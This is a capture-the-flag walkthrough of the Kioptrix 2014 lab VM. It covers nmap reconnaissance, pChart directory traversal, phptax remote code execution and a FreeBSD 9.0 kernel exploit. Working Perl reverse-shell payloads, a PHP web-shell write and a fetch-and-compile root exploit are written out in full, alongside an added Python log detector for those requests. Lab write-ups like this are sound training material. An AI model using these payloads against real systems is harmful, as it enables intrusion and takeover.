Vulnhub Kioptrix 2014 target machine: getting a shell and escalating privileges

Target setup
In VMware, click "Scan for Virtual Machines"
https://track123.oss-cn-beijing.aliyuncs.com/20250218203956453.png
then scan the folder that contains the target VM.
Information gathering
Scan for the IP
Use nmap to find the target machine's IP address:
nmap -sn 192.168.108.0/24
https://track123.oss-cn-beijing.aliyuncs.com/20250218220737260.png
Hence:
Attacker: 192.168.108.130
Target: 192.168.108.140

Scan ports and service information
Scan for open ports:
nmap -p 1-65535 192.168.108.140
https://track123.oss-cn-beijing.aliyuncs.com/20250218221215936.png
Useful information:
22/tcp closed ssh #SSH service
80/tcp open http #web site
8080/tcp open http-proxy #HTTP proxy or alternate web port

Scan service information:
nmap -sV 192.168.108.140
https://track123.oss-cn-beijing.aliyuncs.com/20250218221826387.png
Useful information:
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

Fingerprinting
Run the following command:
nmap 192.168.108.140 -p 22,80,8080 -sV -sC -O --version-all
https://track123.oss-cn-beijing.aliyuncs.com/20250218222555403.png
Finding the attack surface and exploiting it
Probing for information
Visiting port 8080 returns "access denied":
https://track123.oss-cn-beijing.aliyuncs.com/20250219174720695.png
Visiting port 80, the following hint is found in the page source:
https://track123.oss-cn-beijing.aliyuncs.com/20250218223709099.png
Visit the page http://192.168.108.140/pChart2.1.3/examples/index.php
https://track123.oss-cn-beijing.aliyuncs.com/20250218223737174.png
According to the hint this should be related to pChart2.1.3, so look up vulnerabilities for that version:
https://track123.oss-cn-beijing.aliyuncs.com/20250219150016704.png
Reference article: https://vk9-sec.com/exploiting-pchart-2-1-3-directory-traversal-xss/
Exploitation
There are two useful pieces of information; try accessing each in turn.
https://track123.oss-cn-beijing.aliyuncs.com/20250219165838830.png
It can be accessed normally:
https://track123.oss-cn-beijing.aliyuncs.com/20250219165929622.png
Now look at the configuration file. The main configuration file of the Apache HTTP Server is installed as /usr/local/etc/apache2x/httpd.conf, where x is the version number. It shows that the site must be accessed on port 8080, and only with a browser User-Agent of Mozilla/4.0.
https://track123.oss-cn-beijing.aliyuncs.com/20250219170102533.png
Visiting port 8080 now shows only a single link that redirects; try following it:
https://track123.oss-cn-beijing.aliyuncs.com/20250219170207036.png
Clicking around at random reveals nothing useful:
https://track123.oss-cn-beijing.aliyuncs.com/20250219170229779.png
Searching for phptax exploits turns up an exploit script:
https://github.com/NHPT/phptaxExploit
https://track123.oss-cn-beijing.aliyuncs.com/20250219170318999.png
Download it on Kali and use it:
https://track123.oss-cn-beijing.aliyuncs.com/20250219170407734.png
Reverse shell
Start a listener with nc -lvvp 4444; the shell connects back successfully:
python3 phptax_exp.py -u http://192.168.108.140:8080/phptax -e perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.108.130%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27
https://track123.oss-cn-beijing.aliyuncs.com/20250219170513565.png
Other methods
Method 1
This target can also be exploited in other ways. Looking up phptax vulnerabilities, there are two remote command execution vulnerabilities:
https://track123.oss-cn-beijing.aliyuncs.com/20250219170825747.png
Download them and inspect them:
searchsploit -m 21665.txt
searchsploit -m 25849.txt
Look at 25849.txt first; it has two exploitation methods:
https://track123.oss-cn-beijing.aliyuncs.com/20250219171149696.png
url/index.php?field=rce.php&newvalue=<?php passthru($_GET);?>
url/data/rce.php?cmd=id
After this has run, visit the page:
https://track123.oss-cn-beijing.aliyuncs.com/20250219171349089.png
Then get a reverse shell:
http://192.168.108.140:8080/phptax/data/rce.php?cmd=perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Just listen on Kali.
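All of the vectors used in this write-up (the pChart 2.1.3 directory traversal, the phptax file write through index.php?field=...&newvalue=..., the resulting data/rce.php?cmd=... web shell, and the drawimage.php?pfilez=... command injection from the second exploit entry) leave their payload in the request line, so a defender can find them in Apache's access log. The following Python script is an added example written for this write-up; it is not code from the original post, from phptax, or from pChart. It parses combined-format log lines, decodes the query string (twice, so double percent-encoding does not hide a payload), and flags the four patterns. The sample log lines, the pChart parameter names Action/Script, and the rule names are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not taken from the original post).
# Lines 1-4 mimic the requests described in the write-up; lines 5-6 are benign requests.
SAMPLE_LOG = """\
192.168.108.130 - - [19/Feb/2025:17:01:02 +0800] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.168.108.130 - - [19/Feb/2025:17:11:49 +0800] "GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.108.130 - - [19/Feb/2025:17:13:49 +0800] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/4.0"
192.168.108.130 - - [19/Feb/2025:17:10:47 +0800] "GET /phptax/drawimage.php?pfilez=xxx;id;&pdf=make HTTP/1.1" 200 40 "-" "Mozilla/4.0"
192.168.108.50 - - [19/Feb/2025:17:20:00 +0800] "GET /phptax/index.php?field=name&newvalue=John HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.108.50 - - [19/Feb/2025:17:21:00 +0800] "GET /pChart2.1.3/examples/index.php?Action=View&Script=example.drawBarChart.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Apache combined format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL = re.compile(r"\.\.[/\\]")               # ../ or ..\ after decoding
PHP_TAG = re.compile(r"<\?(php)?", re.IGNORECASE)  # PHP open tag in a value that is written to disk
SHELL_META = re.compile(r"[;|&`$]")                # shell metacharacters inside a filename parameter


def deep_unquote(value, rounds=2):
    """Percent-decode up to `rounds` times so %252e%252e%252f still yields ../ ."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a query string on '&' only (never on ';', which is part of the payload here)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(deep_unquote(key), []).append(deep_unquote(value))
    return params


def classify(path, params):
    """Return the rule names triggered by a decoded path and its query parameters."""
    hits = []
    low = path.lower()
    values = [v for vs in params.values() for v in vs]
    if TRAVERSAL.search(path) or any(TRAVERSAL.search(v) for v in values):
        hits.append("directory_traversal")
    if low.endswith("/phptax/index.php") and "field" in params and any(
        PHP_TAG.search(v) for v in params.get("newvalue", [])
    ):
        hits.append("phptax_file_write")
    if low.endswith("/phptax/drawimage.php") and any(
        SHELL_META.search(v) for v in params.get("pfilez", [])
    ):
        hits.append("phptax_command_injection")
    if "/phptax/data/" in low and low.endswith(".php") and "cmd" in params:
        hits.append("webshell_invocation")
    return hits


def detect(log_text):
    """Scan access-log text and return one finding per (line, rule) pair."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a production tool would count and report these
        parts = urlsplit(m.group("target"))
        path = deep_unquote(parts.path)
        params = parse_query(parts.query)
        for rule in classify(path, params):
            findings.append({"line": lineno, "ip": m.group("ip"), "rule": rule,
                             "path": path, "ua": m.group("ua")})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['rule']} {f['path']} (UA {f['ua']})")
```

Run against the constructed sample, the four attacker lines are flagged and the two benign lines are not. The query string is split by hand rather than with urllib's parse_qs because older Python versions also split on ';', which would hide exactly the separator the pfilez injection relies on; the User-Agent is kept in each finding because the write-up notes that the 8080 virtual host only answers Mozilla/4.0 clients, which makes that header a useful pivot when reviewing the log.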
Method 2
Now look at 21665.txt, which also contains an exploitation method:
https://track123.oss-cn-beijing.aliyuncs.com/20250219171047417.png
Decode it and take a look:
https://track123.oss-cn-beijing.aliyuncs.com/20250219151635740.png
Usage is as follows; again, just listen on Kali:
http://192.168.108.140:8080/phptax/drawimage.php?pfilez=xxx;perl -e 'use Socket;$i="$ENV{192.168.108.130}";$p=$ENV{4444};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';&pdf=make

Privilege escalation
Checking the target's information: the current user is www and the kernel is FreeBSD 9.0.
uname -a: prints detailed system information, including kernel version, hostname, operating system type and architecture.
https://track123.oss-cn-beijing.aliyuncs.com/20250219170713934.png
Look up known vulnerabilities for this version:
https://track123.oss-cn-beijing.aliyuncs.com/20250219172129615.png
The target has no wget command:
https://track123.oss-cn-beijing.aliyuncs.com/20250219172301814.png
Search online for another way to download files on FreeBSD:
https://track123.oss-cn-beijing.aliyuncs.com/20250219172822839.png
Download the exploit scripts locally:
searchsploit FreeBSD 9.0 -m 26368.c
searchsploit FreeBSD 9.0 -m 28718.c
https://track123.oss-cn-beijing.aliyuncs.com/20250219173349167.png
Start a web server on the attacker machine:
python -m http.server 80
Download the exploit on the target, compile it and run it:
fetch http://192.168.108.130/26368.c
gcc 26368.c -o 26368
chmod 777 26368
./26368
Downloaded and compiled successfully:
https://track123.oss-cn-beijing.aliyuncs.com/20250219174117981.png
Add execute permission and run it:
https://track123.oss-cn-beijing.aliyuncs.com/20250219174223542.png
Privilege escalation successful.